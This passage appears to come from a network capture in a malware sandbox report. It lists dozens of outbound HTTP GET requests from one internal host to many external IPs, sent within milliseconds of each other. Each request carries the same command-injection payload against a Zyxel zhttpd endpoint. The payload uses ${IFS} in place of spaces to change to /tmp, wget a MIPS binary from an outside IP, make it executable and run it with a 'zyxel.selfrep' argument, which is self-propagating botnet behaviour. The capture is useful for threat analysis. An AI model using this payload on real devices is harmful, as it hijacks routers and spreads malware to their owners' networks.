                                      Jan 14, 2024 15:51:05.750632048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9226192.168.2.145587499.165.0.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750673056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9227192.168.2.1440636114.38.240.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750721931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9228192.168.2.1459942179.18.186.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750758886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9229192.168.2.14392961.36.19.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750818968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9230192.168.2.1454938118.53.1.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750859976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9231192.168.2.145529860.131.211.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750885963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9232192.168.2.1457662183.172.136.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750919104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9233192.168.2.1452032116.27.6.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750978947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9234192.168.2.1445542141.205.120.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751012087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9235192.168.2.145587854.235.118.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751063108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9236192.168.2.143698693.108.186.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751106024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9237192.168.2.1460000120.198.110.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751158953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9238192.168.2.144584492.31.101.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751192093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9239192.168.2.143411291.217.253.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751246929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9240192.168.2.1449298174.2.245.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751291037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9241192.168.2.1456518160.125.83.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751317978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9242192.168.2.1439774218.238.249.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751385927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9243192.168.2.1436260165.140.96.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751422882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9244192.168.2.1443600118.143.212.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751468897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9245192.168.2.1439922141.136.4.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751513958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9246192.168.2.145178236.0.94.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751566887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9247192.168.2.1436560203.51.75.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751595974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9248192.168.2.1455530161.173.250.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751640081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9249192.168.2.144646497.35.179.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751677036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9250192.168.2.145870853.110.228.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751707077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9251192.168.2.1451272219.172.23.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751749039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9252192.168.2.143998878.26.155.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751796961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9253192.168.2.145710671.38.47.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751843929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9254192.168.2.143403875.30.208.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751883030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9255192.168.2.1435866186.91.54.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751907110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9256192.168.2.1452902105.196.106.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.751964092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9257192.168.2.1447556152.252.130.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752017975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9258192.168.2.1454396167.8.179.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752038002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9259192.168.2.143420467.221.220.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752103090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9260192.168.2.1443138175.17.253.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752130032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9261192.168.2.145756635.86.123.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752166033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9262192.168.2.1442056161.28.122.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752182007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9263192.168.2.1436792165.51.172.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752211094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9264192.168.2.1446194218.54.54.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752269983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9265192.168.2.1448326152.124.117.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752304077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9266192.168.2.1451374189.225.56.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752332926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9267192.168.2.1456610157.122.75.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752409935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9268192.168.2.1452484173.150.146.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752424002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9269192.168.2.1454196176.152.234.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752474070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9270192.168.2.1441082149.91.83.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752510071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9271192.168.2.1453608197.73.137.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752552986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9272192.168.2.1440698138.85.70.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752603054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9273192.168.2.146065699.211.201.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752655983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9274192.168.2.1438028202.58.213.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752701998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9275192.168.2.1439112153.188.39.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752737045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9276192.168.2.1433168177.21.56.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752758026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9277192.168.2.145496862.1.41.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752791882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9278192.168.2.1442900105.217.163.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752836943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9279192.168.2.1456926108.149.255.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752892971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9280192.168.2.1453936111.156.192.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752923012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9281192.168.2.145886076.10.199.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.752958059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9282192.168.2.145450289.85.195.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753010988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9283192.168.2.1432898128.226.91.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753045082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9284192.168.2.143850853.6.238.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753086090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9285192.168.2.143821863.138.228.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753137112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9286192.168.2.144226087.79.77.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753171921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9287192.168.2.1448856170.114.227.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753213882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9288192.168.2.143401020.182.143.23443
                                      TimestampBytes transferredDirectionData
